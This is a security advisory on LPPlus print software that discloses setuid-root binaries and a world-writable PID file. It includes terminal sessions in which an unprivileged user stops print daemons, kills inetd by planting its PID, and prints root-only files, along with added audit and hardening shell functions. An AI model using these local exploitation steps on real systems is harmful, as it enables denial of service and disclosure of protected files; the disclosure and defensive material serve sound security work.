COMMAND

    LPPlus

SYSTEMS AFFECTED

    LPPlus 3.3.0 and 3.2.1 (the only versions tested)

PROBLEM

    Dixie Flatline found the following.  LPPlus is Plus Technologies'
    print management system for Unix.  It contains several serious
    security holes, some of which undermine the integrity of the
    printing subsystem and some of which threaten the security of the
    system on which the product is installed.

    Hole #1:
    ========
    Of the 74 binaries that the installer put on the Solaris system, 26
    were installed suid to root and world-executable.  On the Linux box,
    it was 26 out of 64.  Several of these should not be suid-root, or
    should be group-executable only and carefully restricted.

    For example, the following binaries are installed mode 4755 by the
    installer:

        $LPHOME/bin/dccsched
        $LPHOME/bin/dcclpdser
        $LPHOME/bin/dccbkst
        $LPHOME/bin/dccshut
        $LPHOME/bin/dcclpdshut
        $LPHOME/bin/dccbkstshut

    The first three start the scheduler, LPD server and network status
    daemons, respectively.   The next  three stop  the  aforementioned
    services.  In the default  configuration, all six can be  executed
    by  any  unprivileged  user,  effectively  giving  any user on the
    system  the  ability  to  start  and  stop  printing services.  No
    checking  of  userid,  group  or  anything  else  is done prior to
    execution.

        $ id
        uid=600(test) gid=300(users)
        $ ps -ef|grep dcc
            test 26357 26351  0 18:18:06 pts/0    0:00 grep dcc
            root 26262     1  0 17:41:50 ?        0:01 /opt/lpplus/bin/dccsched
            root 26272     1  0 17:42:03 ?        0:00 /opt/lpplus/bin/dcclpdser
            root 26276     1  0 17:42:14 ?        0:00 /opt/lpplus/bin/dccbkst
        $ dccbkstshut
        $ dcclpdshut
        LPD048E Signal sent to dcclpdser to shut down.
        $ dccshut
        LPP054I LP Plus scheduler ordered to shutdown.
        $ ps -ef|grep dcc
            test 26253 26239  0 17:39:45 pts/0    0:00 grep dcc
        $


    Hole #2:
    ========
    $LPHOME/system/lpdprocess is created mode 777.

    This file contains the process  ID of the dcclpdser process.   The
    combination  of  this  file's   permissions  and  the  fact   that
    dcclpdshut is executable by  any user allows an  unprivileged user
    to send  signal 2  (SIGINT) to  any process  on the  system.   All
    that's required is for an unprivileged user to replace the PID  in
    $LPHOME/system/lpdprocess  with  the  PID  of their target process
    and then run $LPHOME/bin/dcclpdshut.

        $ id
        uid=600(test) gid=300(users)
        $ ps -ef|grep inet
            test 26285 26279  0 17:42:42 pts/0    0:00 grep inet
            root 12276     1  0   Aug 22 ?        0:00 /usr/sbin/inetd -s
        $ cat > $LPHOME/system/lpdprocess
        12276
        ^D
        $ dcclpdshut
        LPD048E Signal sent to dcclpdser to shut down.
        $ ps -ef|grep inet
            test 26291 26279  0 17:45:17 pts/0    0:00 grep inet
        $
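
    The root cause of Hole #2 is that dcclpdshut trusts whatever PID it
    reads from a file anyone can write.  The following is an added
    example, not LPPlus code, showing the checks a privileged shutdown
    helper should make before signalling: the PID file must be a regular
    file owned by the expected account and writable by nobody else, its
    content must be a sane PID, and that PID must currently belong to
    the expected daemon.  The daemon name and owner are parameters
    (assumed values; in a real install they would be dcclpdser and root)
    so the function can be exercised against a constructed PID file.

```shell
# Added example (not LPPlus code): checks a setuid shutdown helper such as
# dcclpdshut should make before trusting a PID file.
#
# usage: checked_pid PIDFILE EXPECTED_COMM [OWNER]
# Prints the PID and returns 0 only if every check passes; otherwise
# prints the reason on stderr and returns 1.  OWNER defaults to root and
# may be a name or a numeric uid (both accepted by find -user).
checked_pid() {
    pf=$1; want=$2; owner=${3:-root}

    # Must be a regular file, not a symlink a user could point elsewhere.
    if [ -L "$pf" ] || [ ! -f "$pf" ]; then
        echo "$pf: not a regular file" >&2; return 1
    fi
    # Must be owned by the expected account ...
    if [ -n "$(find "$pf" ! -user "$owner")" ]; then
        echo "$pf: not owned by $owner" >&2; return 1
    fi
    # ... and writable by nobody else (Hole #2 is a mode 777 PID file).
    if [ -n "$(find "$pf" \( -perm -0020 -o -perm -0002 \))" ]; then
        echo "$pf: writable by group or others" >&2; return 1
    fi

    # Content must be a single positive integer greater than 1.
    pid=
    read -r pid < "$pf" || true
    case $pid in
        ''|*[!0-9]*) echo "$pf: does not contain a PID" >&2; return 1 ;;
    esac
    if [ "$pid" -le 1 ]; then
        echo "$pf: refusing to signal PID $pid" >&2; return 1
    fi

    # The PID must currently belong to the daemon we expect, so a stale
    # or substituted PID (inetd in the advisory) is never signalled.
    comm=$(ps -o comm= -p "$pid" 2>/dev/null | tr -d ' ')
    comm=${comm##*/}
    if [ "$comm" != "$want" ]; then
        echo "$pf: PID $pid is '${comm:-not running}', not $want" >&2
        return 1
    fi

    echo "$pid"
}

# Invocation against a real install; only runs when LPHOME is set.
if [ -n "${LPHOME:-}" ] && pid=$(checked_pid "$LPHOME/system/lpdprocess" dcclpdser); then
    echo "safe to signal dcclpdser, PID $pid"
fi
```

    Note that the command-name check is the one that matters most:
    file permissions alone do not help once the PID has been reused by
    another process, so a signal should only ever go to a process that
    is verifiably the daemon.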

    Hole #3:
    ========
    $LPHOME/bin/dccscan is suid-root and can be executed by any user.
    It may allow an unprivileged user to print files to which he does
    not have read access.  The ramifications are fairly obvious:
    although an unprivileged user cannot read /etc/shadow (for
    example), he may be able to print it out using this utility.  In
    testing, this worked even when sending to printers to which the
    test user had not been given any access in the LPPlus security
    configuration (in fact, the test user had no access to ANY printers
    or ANY LPPlus services).

        # id
        uid=0(root) gid=1(other)
        # ls -alt /root/test
        total 6
        drwx------   2 root     other        512 Sep  5 17:46 .
        -r--------   1 root     other        365 Sep  5 17:46 foo
        drwx------   3 root     other        512 Sep  5 17:46 ..
        # su - test
        Sun Microsystems Inc.   SunOS 5.6       Generic August 1997
        $ id
        uid=600(test) gid=300(users)
        $ ls -alt /root/test
        /root/test: Permission denied
        $ dccscan /root/test 30 5 "-dlp0"
        $
        
        # now, go to the printer and wait for the files to come out, or watch them
        # being queued as root, if you have access to dccstat

    Some other potential holes:
    * if the archive module is installed, $LPHOME/bin/dccasweep can be
      executed by any user.  This may undermine the integrity of the
      archiving facility.
    * if the web interface is installed, it uses a very old beta
      version of Apache, and the installation requires that the server
      (and all of its children, which run as nobody out of the box)
      run as root.
    * on the Linux system, $LPHOME was created mode 777.  Root's umask
      was set to 022.  This didn't seem to be the case on the Solaris
      system, although the reason for this may be the different
      version of LPPlus rather than the different Unix flavours (see
      below for version info).

SOLUTION

    At  this  time,  no  patches  or  updated  versions are available.
    However, most of  the utilities in  question either don't  need to
    be suid,  or can  be group-owned  by a  more restricted  group and
    mode 4750.
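
    As an added example (not vendor code), the shell functions below
    audit an LPHOME tree for the two permission problems described
    under Hole #1 and Hole #2 (setuid binaries anyone can execute, and
    world-writable files such as system/lpdprocess) and apply the
    workaround suggested above: a restricted group and mode 4750.  The
    tree and the group are parameters, so the same functions run
    against a constructed directory or a real install; the only LPPlus
    specifics assumed are the bin/ and system/ layout used in this
    advisory.

```shell
# Added example (not LPPlus code): audit and harden an LPHOME tree.

# Setuid binaries that any user may execute (mode 4755 in the advisory).
find_world_exec_suid() {
    find "$1" -type f -perm -4001 2>/dev/null
}

# World-writable files, e.g. $LPHOME/system/lpdprocess created mode 777.
find_world_writable() {
    find "$1" -type f -perm -0002 2>/dev/null
}

# Restrict one setuid binary: owned by a limited group, mode 4750, so only
# members of that group can run it.  chgrp goes first because an
# unprivileged chgrp clears the setuid bit.  Prints the new mode string.
restrict_suid() {
    chgrp "$2" "$1" && chmod 4750 "$1" && ls -l "$1" | cut -c1-10
}

# Take a world-writable file back to owner-writable only.
restrict_writable() {
    chmod go-w "$1" && ls -l "$1" | cut -c1-10
}

# Count lines on stdin without the leading spaces some wc versions emit.
count_lines() {
    n=0
    while IFS= read -r line; do n=$((n + 1)); done
    echo "$n"
}

# Human-readable report for a real install.
audit_report() {
    echo "setuid binaries executable by everyone under $1/bin:"
    find_world_exec_suid "$1/bin"
    echo "world-writable files under $1:"
    find_world_writable "$1"
}

# Only reports on a real install when LPHOME is set and exists.
if [ -n "${LPHOME:-}" ] && [ -d "$LPHOME" ]; then
    audit_report "$LPHOME"
fi
```

    Run the audit first and review the list before applying
    restrict_suid: the advisory notes that some of the 26 binaries do
    need to be setuid for the product to work, and which group should
    own them is a local decision.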

    The  vendor  was  notified   on  8/24/2000.   They  did   respond,
    confirming the existence of the holes.  However, a request for  an
    ETA on an updated release or patches has thus far been ignored.